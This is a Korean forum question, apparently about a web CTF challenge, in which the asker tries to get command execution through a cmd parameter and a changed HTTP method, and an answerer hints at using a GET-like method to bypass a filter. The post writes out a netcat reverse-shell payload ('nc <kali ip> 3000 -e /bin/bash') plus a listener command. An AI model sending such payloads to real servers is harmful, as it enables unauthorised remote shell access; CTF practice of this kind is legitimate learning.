서버에서 연결을 거부합니다

진짜 curl을 사용하는데
POST Method가 안 되면 멀 어케 해야하나요.
진짜 kali에서 어떻게든 하려는데 어떻게 해야 GET인자로 cmd를 줄 수 있나요.

(약 5일 후)

제가 메소드를 바꾸는 방법을 알게 된 이후로 많은 변화가 있었습니다. 노트북으로 돌아왔고
우선 kali linux의 Netcat과 Chrome에 있는 Dev http client 를 사용하게 되었다는 점입니다.

문제는 cmd값으로 " nc+ (내 kali_linux ip) +3000(포트번호)+-e+/bin/bash "를 넣어주고
Method 값도 HEAD로 바꿔주고 kali_linux에서는 " nc -lp 3000 " 으로 들을려고 열어놓고 요청 보내니까 약 30초후 또는 3초후에 꺼져버립니다.

리버스쉘이 안 먹히는 건지 서버의 출력을 받아올려는 포트로 데이터가 안 오는 것 같아서
아웃바운드 규칙같은 것도 설정해주고 백신도 혹시 몰라서 꺼줬는데도 이 상태 그대로 입니다.

4일 이상을 삽질했는데 아직도 답을 모르겠습니다. 다들 HTTP관련 문서를 찾아보라고 하는데
몇번을 봐도 모르겠습니다. 뭐가 잘못된 건지, 심지어 데탑에서는 연결은 되는 것 같은데
정보를 출력해주지 않습니다. 그래서 더 미치겠습니다.

#web
작성자 정보
답변 1
avatar
Sechack
CTF First Place

GET메소드 말고 GET과 비슷한 메소드를 찾아보세요. 먹히는게 하나 있습니다.

2021.12.15. 19:17
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기